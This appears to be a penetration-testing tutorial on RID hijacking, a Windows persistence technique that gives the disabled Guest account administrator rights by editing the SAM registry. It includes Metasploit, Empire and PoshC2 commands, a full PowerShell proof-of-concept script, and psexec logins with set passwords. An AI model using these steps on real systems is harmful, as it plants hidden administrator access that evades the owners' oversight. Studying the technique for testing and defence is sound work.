Persistence – RID Hijacking

Windows operating systems use the RID (Relative Identifier) to differentiate groups and user accounts. It is part of the Security Identifier (SID) and every time a new account or a group is created the number is increased by one. The local administrator group RID is always 500 and standard users or groups typically start with the number 1001. This can assist penetration testers and red team operators to distinguish whether an account is elevated or a standard during RID enumeration.

Sebastian Castro discovered that is is possible to make a modification in the registry in order to make the Guest account an admin by hijacking the RID of a valid account. This technique requires SYSTEM level privileges as the location in the registry is not visible under standard or administrator privileges. During an offensive operation it can be used as a method to maintain persistence using only accounts that are part of the system. Activities will populated in the event log as the user that it has being hijacked instead of the hijacker account.

The registry SAM (security account manager) key stores information about the local accounts of the system. However the contents of this key are hidden from standard and elevated users.

HKEY_LOCAL_MACHINE\SAM\SAM\

The contents of the SAM registry key can be obtained by accessing the Registry as SYSTEM. This can be achieved by opening the registry through “PsExec” with the following arguments.

PsExec64.exe -s -i regedit.exe
Open Registry as SYSTEM

Information for the windows “Guest” account is stored in the following registry key. The hexadecimal value “0x1f5” translates to 501 which is RID of the Guest account. The hexadecimal value of the Administrator account is “0x1f4” as it translates to 500.

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest

This can be validated by running the following WMI query using the windows utility wmic which will return 501 for the Guest account.

wmic useraccount where (name='Guest') get name,sid
Retrieve Guest SID

The RID of the Guest account is specified in the value F of the “000001F5” key. The offset 30 has the hexadecimal value of “0xF501” which needs to be modified to “0xF401” (500) to hijack the RID of the administrator account. The offset 38 determines whether the account is enabled or disabled (1502 disabled – 1402 enabled).

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
RID Hijacking – Default Registry Values
RID Hijacking – Hijacked Registry Values

Alteration of these values will enable the Guest account (disabled by default) and will hijack an elevated RID (local administrator). The Guest account will have the privileges of an administrator, however the account will still not appear in the local administrator group.

Depending on the scenario this technique has been added into various offensive security tools. Metasploit Framework, Empire, Crackmapexec, ibombshell and PowerShell scripts can be used to automate the process and obtain persistence through RID Hijacking.

Metasploit

Sebastian Castro developed a Metasploit post exploitation module as an initial proof of concept. The module requires an elevated Meterpreter session and has three stages:

  1. Check privileges and attempt to elevate to SYSTEM
  2. Enable Guest account
  3. Overwrite RID
use post/windows/manage/rid_hijack 
set SESSION 1
set GETSYSTEM true
set GUEST_ACCOUNT true
set PASSWORD pentestlab
exploit
RID Hijacking – Metasploit Module

In Windows 10 environments the profile of the Guest account is broken which has a result the explorer.exe to crash and restart continuously. Therefore connection through RDP will not be stable. Impacket suite contains a python implementation of “psexec” which can be used to connect to the target host with the Guest account.

./psexec.py Guest:pentestlab@10.0.0.2
Impacket – Guest Authentication

Alternatively authentication with the Guest account and the new password and executing from the command prompt the following command will validate that the Guest account has become an Admin since the RID will be 500.

whoami /all
Guest SID – 500

PowerShell

The PowerShell implementation of this technique was also developed by Sebastian Castro and can be found in his GitHub repository. The PowerShell script has similar capabilities with the Metasploit module but can be used also to hijack any account on the system.

Invoke-RIDHijacking -UseGuest -RID 500 -Password Password1
RID Hijacking – PowerShell Module

Kevin Joyce also implemented this technique into a PowerShell script (ridhijack) which can be executed directly from memory using Empire, PoshC2 or any other PowerShell based command and control framework. The script prior to registry alteration will export the associated registry key into the disk in order to roll-back back the system to it’s original state if something fails or when the execution has been completed.

<#
Date 10/24/2018
Author: Kevin Joyce
Description: RID Hijacking - runs PowerShell as SYSTEM and modifies a registry value associated with the Guest account. Sets the RID to 500 (Administrator), enables and sets the password for the Guest account. The objective of this script is to be a proof of concept for a RID Hijacking persistence technique. This technique allows an attacker to use the Guest account with administrative privileges.
#>

#set path of target key
$key = 'HKLM:\SAM\SAM\Domains\Account\Users\000001F5'

#get content of target value
$binaryValue = (Get-ItemProperty -Path $key -Name "F")."F" 

#exports contents of current registry values, allows to roll back if corruption occurs
reg export 'HKLM\SAM\SAM\Domains\Account\Users\000001F5' .\export.reg
Write-Host 'Registry key exported.'

#change guest RID at offset 0x30 to 244 (500) - default 245 - to set the RID back to 501 change $newValue below to 245
$newValue = 244
if ($binaryValue[48] -notin (244,245)){
    throw 'Unknown value set at offset 0x30. Expected values: 244 or 245. Current value: ' + $binaryValue[48] +'.'
    stop
} else {
    $binaryvalue[48] = $newValue
    Write-Host 'Value at 0x30 set to '  $binaryValue[48]
}


#enable guest account at offset 0x38 to 20 - default 21 - to disable guest account change $newValue below to 21
$newvalue = 20
if ($binaryValue[56] -notin (20,21)){
    throw 'Unknown value set at offset 0x38. Expected values: 20 or 21. Current value: ' + $binaryValue[56]+'.'
    stop
} else {
    $binaryvalue[56] = $newvalue
    Write-Host 'Value at 0x38 set to '  $binaryValue[56]
}

#iterate through every position from original value converting to hexadecimal and storing in new variable
$hexValue = ''
for ($i =0; $i -lt $binaryValue.length; $i++){ 
    $hexValue += "{0:x2}" -f $binaryValue[$i]  
	}
Write-Host 'You are about to change the RID and enable the Guest account. Press enter to continue.'
pause
 
#set value of F to contents of variable
reg add "HKLM\SAM\SAM\Domains\Account\Users\000001F5" /v F /t REG_BINARY  /d $hexValue /f 
Write-Host 'Guest account enabled and RID set to 500.'

#set Guest password
$password = '!Password123!'
net user guest $password
Write-Host 'Guest account password set to' $password
Write-Host ""

Write-Host "Open a command prompt as Guest to see the new RID and privileges associated with the Guest account. Pressing enter will continue the script and roll back all changes besides the password of the Guest account." 
Write-Host ""
Write-Host "To run a command promp as Guest, shift+right click cmd.exe and select Run as different user. When prompted enter .\Guest for the username and $password as the password. This will spawn a command prompt window. Once this pops up, enter 'whoami /all | more' to see information about the Guest account. Once complete, you can come back to this screen and press enter to continue."
pause

#imports exported contents of previous registry keys, rolls back all changes
reg import .\export.reg
Write-Host 'Registry key rolled back to original.'
Write-Host 'Proof of concept complete.'
pause

Importing the module will execute the script automatically.

Import-Module .\RIDHIJACK.ps1
RID Hijack PowerShell

Pressing the shift key with right click allows programs to be executed as a different user from the current if credentials are supplied similar to the “runas” command.

Run CMD as Guest

A new command prompt will open under the context of the Guest user. Executing the command “whoami /all” will validate that the RID of the Guest user is 500 which means that has the privileges of the local administrator.

Guest User Information

Empire

Empire contains a module which can be used to perform the RID Hijacking attack. The module must be executed from an elevated agent in order the technique to be successful. The options that should be configured will perform the following:

  • Use of the Guest account
  • Enable Guest account
  • Assign a password to the Guest account
usemodule persistence/elevated/rid_hijack*
set UseGuest True
set Password pentestlab
set Enable True
execute
RID Hijacking – Empire Module

PoshC2

PoshC2 has the ability to load PowerShell modules in order to extend it’s offensive capability. Using the RID Hijacking PowerShell script and executing the following command will modify the RID of the Guest account to 500.

loadmodule /opt/PoshC2/resources/modules/Invoke-RIDHijacking.ps1
Invoke-RIDHijacking -UseGuest -RID 500 -Password Password1
RID Hijacking – Load PoshC2 Module

The technique will executed on the target host following the same stages as the Metasploit module. Initially it will attempt to elevated privileges to SYSTEM (instead of Admin), the offset will be modified to change the RID from 501 to 500 and a new password will be assigned to the target account.

RID Hijacking – PoshC2

Psexec from impacket can be used to authenticate with the host via SMB with the Guest account and the new password that has been assigned.

./psexec.py Guest:Password1@10.0.0.4
impacket – psexec

YouTube

RID Hijacking Demo

References